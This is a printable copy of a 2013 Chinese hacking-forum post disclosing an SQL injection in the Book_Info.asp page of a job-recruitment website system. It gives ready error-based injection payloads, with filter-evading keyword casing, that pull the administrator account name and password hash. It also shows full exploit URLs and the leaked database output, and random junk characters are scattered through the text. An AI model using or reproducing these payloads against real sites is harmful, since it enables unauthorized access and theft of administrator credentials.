中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
. L& y' w2 p, |- b6 p! W* K7 ?
0 {) M' l' a$ A/ a+ Y. K4 O+ U! b此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! P  v& G& p0 O% e6 u2 Y * f# J9 B7 X- h- y1 C. N  ~
exp:如下+ F( I; b5 _& i: N
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)* {* h  L7 n: W* W; Q
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- ~. {# n8 l  {; o0 Z6 W, F : [' q: L4 b9 X* X4 ~1 |
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' q. z4 b8 q; B

# H; R* d0 X) T, U1 a, v2 sMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
+ v6 V3 O' E; m  ~9 z- t4 t % G+ ~# e; r+ M" T4 ?
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。9 p' q9 c$ M' C6 G4 n7 z

- s1 ?2 f$ Z. t2 c/Educate/Book_Info.asp,行 8
7 X" C; p/ o, S# |6 A ! M  k2 a+ u. }9 A
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 Q5 B% y/ S1 x" B

& {* }, d2 E6 l/ b) x9 hMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'  G" d* S4 K5 p4 O" B* I$ P2 H8 G, D
! u: ], |3 _% l3 S% J" G* `
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% E+ r$ T) [$ w6 P: u
$ O9 p) D3 j& d0 H- s
/Educate/Book_Info.asp,行 8! J8 B) l% S* A





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2